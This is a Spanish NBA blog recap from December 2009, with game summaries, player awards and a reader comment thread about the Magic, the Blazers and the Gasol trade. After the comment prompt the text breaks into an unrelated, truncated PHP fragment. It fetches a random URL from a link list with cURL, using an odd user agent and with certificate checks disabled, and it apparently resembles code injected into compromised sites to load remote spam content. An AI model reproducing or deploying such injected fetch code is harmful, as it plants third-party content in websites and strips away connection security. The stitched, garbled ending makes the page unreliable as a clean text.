La Crónica (17/12/2009)

18 de December de 2009 por TheDeerHunter

Comentaba nuestro compañero Magic un dato que me deja helado. ¡16 derrotas seguidas de los Suns cuando son televisados por la TNT! En NBA.COM dicen que es la número 17… Eso es lo que se llama gafada y lo demás son tonterías.

Anoche la maldición se vistió de jugador Nº4 de Portland. A los que no sois fans de los Blazers apenas os sonará el dorsal. Uno de los ojitos izquierdos de McMillan, Jerryd Bayless, se destapó con el partido de su vida, dejando en evidencia, junto a Roy, la defensa exterior de los Suns. Un respiro para el técnico y casi una sentencia para André Miller. En agradecimiento, McMillan quizá le deje a Bayless jugar 5 o 10 minutos el próximo partido, no sea que se le vaya a subir a la cabeza, que la confianza es subversiva.

En Miami, Wade y Beasley le endosaron la 7ª derrota a los Magic en un duelo que perfectamente podría ser primera ronda en Marzo. Los del mayor de los Van Gundy volvieron a mostrar una preocupante indolencia. No hubo partido, con Howard sosegado y el resto de los pilares completamente inoperantes. 19 puntos y 5 rebotes no justifican los más de 35 millones de dólares que cobran Rashard Lewis y Vince Carter.

Por último, los Knicks trataron de asaltar el United aplicando el modelo de la ruleta rusa. Más triples (47) que tiros de dos (39)… Si suena la flauta, bien (33 puntos en un cuarto) y si no toca no tan bien (16 en el siguiente). Los Bulls (raro en ellos) no se pusieron nerviosos y trataron de no cometer muchos errores. Simplemente tuvieron que esperar la previsible autodestrucción de los Knicks. Respiro para Del Negro. Igual tiene suerte y llega a Navidad.

PREMIOS

MVP: Que levante la mano quien se esperase una actuación como ésta de Jerryd Bayless, con 29 puntos (16 de ellos en el último cuarto), 4 rebotes y 3 asistencias en 29 minutos para reivindicarse en partido televisado para todo el país. La magnífica actuación de Luol Deng (24 puntos, 13 rebotes, 5 asistencias) para remontar a los Knicks merece una mención.

El rookie: Taj Gibson sigue exprimiento sus minutos y anoche contribuyó a la victoria de los Bulls con 12 puntos, 10 rebotes y 2 tapones.

La sorpresa:  (Ver MVP).

La decepción: El sueldo de Rashard Lewis debería dar para mucho más que los 9 puntos (3 de 9 en tiros), 3 rebotes y 1 asistencia que el ex Sonics ofreció ante los Heat. Las peores actuaciones de la noche sin embargo fueron las de Brad Miller (0 puntos, 0 de 5 en tiros, 2 rebotes, 0 asistencias, 0 robos, 0 tapones) y Matt Barnes (0 puntos con 0 de 8 en tiros).

El mayor esfuerzo en vano: Los 27 puntos y 11 rebotes de Amaré y los 16 puntos, 13 asistencias y 5 rebotes de Nash cayeron en saco roto por culpa de… (ver MVP).

RAZONES PARA TRASNOCHAR

Con 11 partidos programados para la próxima madrugada, es fácil encontrar buenos motivos para combatir el sueño. Nuestra sugerencia es empezar a la 1h30 con el Jazz @ Hawks, y combinarlo a partir de las 2h00 con el Nuggets @ Hornets y, a las 2h30, con el Rockets @ Mavs. Los amantes de la NCAA y de los jóvenes talentos tal vez prefieran el duelo Tyreke Evans vs Johnny Flynn (es decir, Kings @ Wolves) a partir de las 2h00.

Comenta

11 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Está claro que Lewis y Carter cobran demasiado, pero recuerda que el año que ficharon a Lewis era el único agente libre de calidad que había, lo que supuso que su fichaje fuera lo más parecido a una subasta para los equipos que aspiraban a mejorar. Lo de los 19 puntos y 5 rebotes, me parece un poco ventajista, no todos los días van a a hecer estos pertidos tan malos, sin ir más lejos, entre los 2 promedian 37p-10rb.

    El fichaje de Miller por los Blazers está cuajando lo mismo que el del turco por Toronto.
    El que haya enseñado a Frye este verano a tirar de 3, se merece un buen aumento de sueldo. Ya avn 67 triples con un 45%. qué pensará ahora Mcmillan?

      Citar

  2. TheDeerHunter dice:
    #2

    37-10 me parece insuficiente para casi 40 millones de dólares que cobran y cobrarán. Rashard, para mí, está haciendo una temporada para que le fusilen (más por lo extradeportivo que por lo deportivo, pero bueno) y lo que es peor, sin ofrecer él nada del otro jueves ha logrado que Ryan Anderson rinda bastante peor y que Brandon Bass ni rinda. De todas formas opino que en este punto el principal responsable es SVG, pues debería darle más minutos de 3.
    Después Vince ha bajado todavía 2 décimas (más) en sus porcentajes de 2 y 4 en sus porcentajes de 3. Defensivamente reciben casi 3 puntos más con él que con Turkoglu… aunque de momento sólo se haya traducido en una derrota más que el año pasado (aunque las del año pasado todas eran contra equipazos excepto la de Memphis)
    Ni uno ni otro terminan de encontrar su sitio en este sistema… y sin ellos, Orlando es un equipo plano.

    ¿Y qué pensará McMillan de lo de Frye?? Pues que Roy es dios y Blake su arcangel.

      Citar

  3. Love Denise dice:
    #3

    Ok, está claro que cobra mucho, pero Rashard es vital en este equipo, a Howard también le viene fenomenal que el 4 de su equipo se situe a 7 metros, creo que si no hubiesen fichado a Lewis, Orlando no habría llegado a la final del año pasado ni en sueños, y respecto a este año, todavía no me parece excesivamente preocupante las derrotas que han sufrido (19-7), lo de esta noche, creo que es un mal partido, un día tonto, sin más. Respecto a Lewis de 3…, creo que se desaprovecharía algo su potencial, al jugar de 4 abierto, siempre está defendido por gente más grande, pesada, lo cual, tienen dificultades para defenderle a 7 metros, si lo pones de 3 y lo emparejas con gente de su tamaño, envergadura y rapidez,k creo que no tiraría tan cómodo de 3, y tampoco es que Lewis sea una maravilla posteando.
    de todas formas, no estaría mal que SVG lo probase ahí algún día, y de paso minutos para Bass ya!!!!

    No creo que porque Orlando reciban 3 ptos más, sea por el cambio Vince-Turko, échale un vistazo a cómo está defendiendo el turco en Toronto. Es más el cambio Vince-Turko, me parece muy favorable para Orlando, siempre y cuando Vince no se crea Jordan y empiece a tirarse 20y picos tiros.

      Citar

  4. TheDeerHunter dice:
    #4

    A lo que dices primero, totalmente de acuerdo… hasta cuando llegas a lo de desprovecharle jugando de 3. Te recuerdo que jugando de 3 en Seattle se ganó el contrato que tiene ahora, marcándose varias temporadas seguidas por encima del 20-5 y siendo poco de lo bueno defensivamente que tenía aquel equipo.
    Creo que puede hacerlo muy bien de 3 y puede hacer daño eventualmente de 4. Con esta medida potencias la posición más débil de la plantilla y compensas la posición más fuerte. Además le das tacticidad al asunto…
    Minutos para Bass (y para Gortat) ya!!!

      Citar

  5. Love Denise dice:
    #5

    Cuando digo desaprovecharlo, me refiero a qué creo que jugando de 4, Lewis tira más sólo y en mejores condiciones que si lo hiciera de 3, al jugar de 4, desestabiliza por completo las defensas rivales, puesto que no todos los equipos tienen ala-pivots capaces de defender a 7 metros. Estoy seguro que de 3 tb lo haría bien, pero yo lo prefiero de 4.

      Citar

  6. Love Denise dice:
    #6

    De hecho, una de las claves por las que Orlando eliminó a los Cavaliers, fue por la ausencia de un ala-pivot capaz de defender a 7 metros a Lewis. Ni Varejao ni Joe Smith tenían las cualidades suficientes para ello. Lo mismo les pasaría a otros equipos.

      Citar

  7. educajasur dice:
    #7

    Que levante la mano quien vea a Orlando de nuevo en las finales!! 🙂
    Yo no lo creo.
    Con el turco me da a mi la impresión que había mas grupo, mas equipo. Con Vince y su protagonismo no es lo mismo.
    Respecto a los Blazers, tampoco creo que sea este su año. Aunque algun susto pueden dar, igual que los Miami. ¿Serian capaces de eliminar unos Heat a unos Magic en primera ronda? De Wade me lo esperaría todo 🙂
    Saludos cracks

      Citar

  8. fmneyo dice:
    #8

    Que levnate la mano el que crea que McMillan es un incompetente.

    Lo que yo decía, mayoria absoluta.

      Citar

  9. Love Denise dice:
    #9

    Levano la mano tanto por lo de Mcmillan como por que veo a Orlando en las finales (siempre y cuando no haya lesiones, o Celtics o Cavs consigan algún traspaso tipo Gasol-Kwame Brown y similares)

      Citar

  10. Kajie dice:
    #10

    Love Denise, piensa que el traspaso Gasol-Brown también incluía a un chavalín llamado Marc, que está promediando 14-10 en su temporada de Sophomore y que tiene 5 años menos que su hermano mayor. A ver si el cambio no resultará taaaaan malo.

      Citar

  11. Love Denise dice:
    #11

    Acaso he dicho que el Gasol-(Brown-Marc -Crittenton) fuese malo para Memphis? Fue bueno para L.A. a corto y medio plazo en el ámbito deportivo, y bueno para Memphis en el ambito económico, y en el deportivo a largo plazo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>